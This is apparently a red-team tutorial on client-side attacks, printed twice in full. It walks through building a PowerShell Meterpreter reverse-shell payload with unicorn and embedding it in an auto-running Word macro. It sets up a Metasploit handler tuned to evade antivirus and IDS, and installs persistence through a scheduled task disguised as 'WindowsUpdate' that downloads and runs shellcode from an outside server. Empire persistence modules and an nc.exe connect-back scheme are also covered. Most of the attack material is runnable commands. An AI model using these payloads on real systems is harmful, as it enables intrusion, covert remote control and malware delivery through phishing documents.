Huge Guide to Client-Side Attacks

How to generate payload using unicorn

Clone unicorn and cd to it:

$ git clone https://github.com/trustedsec/unicorn
$ cd unicorn

Generate powershell payload via unicorn:

$ python unicorn.py windows/meterpreter/reverse_https 8.8.8.8 443
[*] Generating the payload shellcode. This could take a few seconds/minutes as we create the shellcode...
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create a listener.
Then you can find your payload in powershell_attack.txt file. Copy it and paste to your macros in a doc file.

When you try to insert payload genetated beunicorn Microsoft Word/Excel might throw an error about string length. You can bypass it. Break the string into multiple substrings and then just concatenate them. Now you macro should look like this:

Sub Auto_Open()
Dim exec As String
str1 = "powershell -window hidden -e JABCAGMAVQA...ABBAGw"
...
str31 = "UALgBHAGUAdABCA...2ADQAX"
str32 = "ABXAGkAbgB...ADsAfQA="
exec = str1 + str2 + str3 + str4 + str5 + str6 + str7 + str8 + str9 + str10 + str11 + str12 + str13 + str14 + str15 + str16 + str17 + str18 + str19 + str20 + str21 + str22 + str23 + str24 + str25 + str26 + str27 + str28 + str29 + str30 + str31 + str32
Shell (exec)
End Sub
Sub AutoOpen()
Auto_Open
End Sub

Using both AutoOpen and Auto_Open the payload is able to be executed in different versions of Microsoft Word.

Sometimes it’s a good idea to use staged payload like described above, sometime not. If you have a small one (for example you just want to drop nc like shell) you can use unicorn again. Write a script in powershell save it and the just run:

unicorn.py <path to your script>

This will generate your payload to paste into your doc file.

Configuring metasploit the right way

It’s always better to start msfconsole in screen. So run:

screen msfconsole

It’s a clever idea to enable logging in metasploit because you don’t want to miss something later:

msf> spool mylog.log

Now let’s can make metasploit a bit more talkative, so set:

msf> set ConsoleLogging true
msf> set LogLevel 5
msf> set SessionLogging true
msf> set TimestampOutput true

You can change your prompt, for example, to:

msf> set PROMPT %T S:%S

To make it look like this:

2016-12-20 15:06:46 +0300 S:0>

You can use whatever you want:

%D = Current local director
%H = Host name
%J = Current number of jobs running
%L = Local IP
%S = Currently number of sessions open
%T = Time stamp
%U = Username

Now let’s fire up our metasploit. As a payload I chose reverse_https. It’s invisible for AV in most cases.

msf> use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https

It’s better to use some popular port number (for example 80 or 443). It allows you to bypass some IDS and DPI. With reverse_https it becomes pretty silent.

msf exploit(handler) > set LHOST <ip>
msf exploit(handler) > set LPORT <port>

Set ExitOnSession to false. It allows us to keep multiple sessions:

msf exploit(handler) > set ExitOnSession false

Moreover, you can create a file in your .msf4 directory (.msf4/msfconsole.rc) in order to set up the configurations every time you start the msfconsole. Now is time to run you metasploit handler. Do it in the background:

msf exploit(handler) > run -j

And catch income connections. To stop or to look at your background jobs use:

msf exploit(handler) > jobs
msf exploit(handler) > jobs -k <number of job>

Persistence

When I tried to use a standard persistence script it gave me an error on a victim machine about some shit in vbs script (line 16, symbol 6 or so). set AuroRunScript execute didn’t work either. So I needed to find another way to create stable, persistent reverse shell. To solve this you need to create a file (autorun.rc in my case) and write all the commands you need in this file. To use this file type the following in metasploit:

set AutoRunScript multi_console_command -rc "/root/autorun.rc"

This will execute the commands from the file every time you get a shell. In autorun.rc I wrote a simple payload for launching powershell.exe which creates a task. This task runs every 45 minutes, downloads Invoke-Shellcode.ps1 file from Empire framework located on our server and launches it.

$ cat aurotun.rc
execute -f "powershell.exe" -a "-ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c Invoke-Command -ScriptBlock { schtasks /create /TN WindowsUpdate /TR \'powershell.exe -ep Bypass -WindowStyle Hidden -nop -noexit -c \'\'IEX ((New-Object Net.WebClient).DownloadString(\'\'\'\'http://9.9.9.9/Invoke-Shellcode.ps1\'\'\'\'\'\'))\'\'; Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 9.9.9.9 -Lport 443 -Force\' /SC minute /MO 45}"

Here we do the following every time we got shell:

Every time task runs it do the following:

Invoke-Shellcode.ps1 is a very useful thing, it allows you to generate different payloads directly in the memory. From the box, it supports http and https reverse shells (at least now).

Playing with Empire

I used Powershell Empire only a couple of times before and now I gave it another chance.

Installation is simple, so we skip it.

First of all you need to start a listener, so type in the following:

(Empire) > listeners
(Empire: listeners) > options
<set corresponding options here>
(Empire: listeners) > execute

Now you have set an Empire listener.

If you type usestager and then tab-tab, you’ll see a different stagers. You can choose any. The good thing is that Empire can generate Microsoft Word macros itself. Use usestager macro if you need it. In my case it was blocked by mail antivirus, but if you have a standalone mail server, everything should be fine.

Persistence

An important part of client side attacks is an ability to have access to a compromised box after reboots, so called persistence. PowerShell Empire has different modules for that.

For example, if you chose to use persistence/userland/schtask you need to type:

(Empire) > usemodule persistence/userland/schtasks
(Empire: persistence/userland/schtasks) > set Agent autorun

Here set Agent autorun is a key part, it tells Empire to run this module every time you get a connection (it’s more logical than in Metasploit in my opinion). Using the same method you can set any module to autorun.

We need to go deeper

The problem with Metasploit and Poweshell Empire is that embeded payloads are detected by anitiviruses.

That’s the reason why in some engagements we use just nc.exe which is legetimate to most AV.

The common scheme looks like:

  1. Host nc.exe on Github;
  2. Download nc.exe from Github to a box;
  3. Add nc.exe to autorun;
  4. Connect back to C&C server.

If you need, use post/multi/manage/shell_to_meterpreter to get meterpreter.

In recent engagements I prefer this method because it seems to be a bit more reliable because it doesn’t depend on the availability of our server.

How to generate payload using unicorn

Clone unicorn and cd to it:

$ git clone https://github.com/trustedsec/unicorn
$ cd unicorn

Generate powershell payload via unicorn:

$ python unicorn.py windows/meterpreter/reverse_https 8.8.8.8 443
[*] Generating the payload shellcode. This could take a few seconds/minutes as we create the shellcode...
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create a listener.
Then you can find your payload in powershell_attack.txt file. Copy it and paste to your macros in a doc file.

When you try to insert payload genetated beunicorn Microsoft Word/Excel might throw an error about string length. You can bypass it. Break the string into multiple substrings and then just concatenate them. Now you macro should look like this:

Sub Auto_Open()
Dim exec As String
str1 = "powershell -window hidden -e JABCAGMAVQA...ABBAGw"
...
str31 = "UALgBHAGUAdABCA...2ADQAX"
str32 = "ABXAGkAbgB...ADsAfQA="
exec = str1 + str2 + str3 + str4 + str5 + str6 + str7 + str8 + str9 + str10 + str11 + str12 + str13 + str14 + str15 + str16 + str17 + str18 + str19 + str20 + str21 + str22 + str23 + str24 + str25 + str26 + str27 + str28 + str29 + str30 + str31 + str32
Shell (exec)
End Sub
Sub AutoOpen()
Auto_Open
End Sub

Using both AutoOpen and Auto_Open the payload is able to be executed in different versions of Microsoft Word.

Sometimes it’s a good idea to use staged payload like described above, sometime not. If you have a small one (for example you just want to drop nc like shell) you can use unicorn again. Write a script in powershell save it and the just run:

unicorn.py <path to your script>

This will generate your payload to paste into your doc file.

Configuring metasploit the right way

It’s always better to start msfconsole in screen. So run:

screen msfconsole

It’s a clever idea to enable logging in metasploit because you don’t want to miss something later:

msf> spool mylog.log

Now let’s can make metasploit a bit more talkative, so set:

msf> set ConsoleLogging true
msf> set LogLevel 5
msf> set SessionLogging true
msf> set TimestampOutput true

You can change your prompt, for example, to:

msf> set PROMPT %T S:%S

To make it look like this:

2016-12-20 15:06:46 +0300 S:0>

You can use whatever you want:

%D = Current local director
%H = Host name
%J = Current number of jobs running
%L = Local IP
%S = Currently number of sessions open
%T = Time stamp
%U = Username

Now let’s fire up our metasploit. As a payload I chose reverse_https. It’s invisible for AV in most cases.

msf> use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https

It’s better to use some popular port number (for example 80 or 443). It allows you to bypass some IDS and DPI. With reverse_https it becomes pretty silent.

msf exploit(handler) > set LHOST <ip>
msf exploit(handler) > set LPORT <port>

Set ExitOnSession to false. It allows us to keep multiple sessions:

msf exploit(handler) > set ExitOnSession false

Moreover, you can create a file in your .msf4 directory (.msf4/msfconsole.rc) in order to set up the configurations every time you start the msfconsole. Now is time to run you metasploit handler. Do it in the background:

msf exploit(handler) > run -j

And catch income connections. To stop or to look at your background jobs use:

msf exploit(handler) > jobs
msf exploit(handler) > jobs -k <number of job>

Persistence

When I tried to use a standard persistence script it gave me an error on a victim machine about some shit in vbs script (line 16, symbol 6 or so). set AuroRunScript execute didn’t work either. So I needed to find another way to create stable, persistent reverse shell. To solve this you need to create a file (autorun.rc in my case) and write all the commands you need in this file. To use this file type the following in metasploit:

set AutoRunScript multi_console_command -rc "/root/autorun.rc"

This will execute the commands from the file every time you get a shell. In autorun.rc I wrote a simple payload for launching powershell.exe which creates a task. This task runs every 45 minutes, downloads Invoke-Shellcode.ps1 file from Empire framework located on our server and launches it.

$ cat aurotun.rc
execute -f "powershell.exe" -a "-ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c Invoke-Command -ScriptBlock { schtasks /create /TN WindowsUpdate /TR \'powershell.exe -ep Bypass -WindowStyle Hidden -nop -noexit -c \'\'IEX ((New-Object Net.WebClient).DownloadString(\'\'\'\'http://9.9.9.9/Invoke-Shellcode.ps1\'\'\'\'\'\'))\'\'; Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 9.9.9.9 -Lport 443 -Force\' /SC minute /MO 45}"

Here we do the following every time we got shell:

Every time task runs it do the following:

Invoke-Shellcode.ps1 is a very useful thing, it allows you to generate different payloads directly in the memory. From the box, it supports http and https reverse shells (at least now).

Playing with Empire

I used Powershell Empire only a couple of times before and now I gave it another chance.

Installation is simple, so we skip it.

First of all you need to start a listener, so type in the following:

(Empire) > listeners
(Empire: listeners) > options
<set corresponding options here>
(Empire: listeners) > execute

Now you have set an Empire listener.

If you type usestager and then tab-tab, you’ll see a different stagers. You can choose any. The good thing is that Empire can generate Microsoft Word macros itself. Use usestager macro if you need it. In my case it was blocked by mail antivirus, but if you have a standalone mail server, everything should be fine.

Persistence

An important part of client side attacks is an ability to have access to a compromised box after reboots, so called persistence. PowerShell Empire has different modules for that.

For example, if you chose to use persistence/userland/schtask you need to type:

(Empire) > usemodule persistence/userland/schtasks
(Empire: persistence/userland/schtasks) > set Agent autorun

Here set Agent autorun is a key part, it tells Empire to run this module every time you get a connection (it’s more logical than in Metasploit in my opinion). Using the same method you can set any module to autorun.

We need to go deeper

The problem with Metasploit and Poweshell Empire is that embeded payloads are detected by anitiviruses.

That’s the reason why in some engagements we use just nc.exe which is legetimate to most AV.

The common scheme looks like:

  1. Host nc.exe on Github;
  2. Download nc.exe from Github to a box;
  3. Add nc.exe to autorun;
  4. Connect back to C&C server.

If you need, use post/multi/manage/shell_to_meterpreter to get meterpreter.

In recent engagements I prefer this method because it seems to be a bit more reliable because it doesn’t depend on the availability of our server.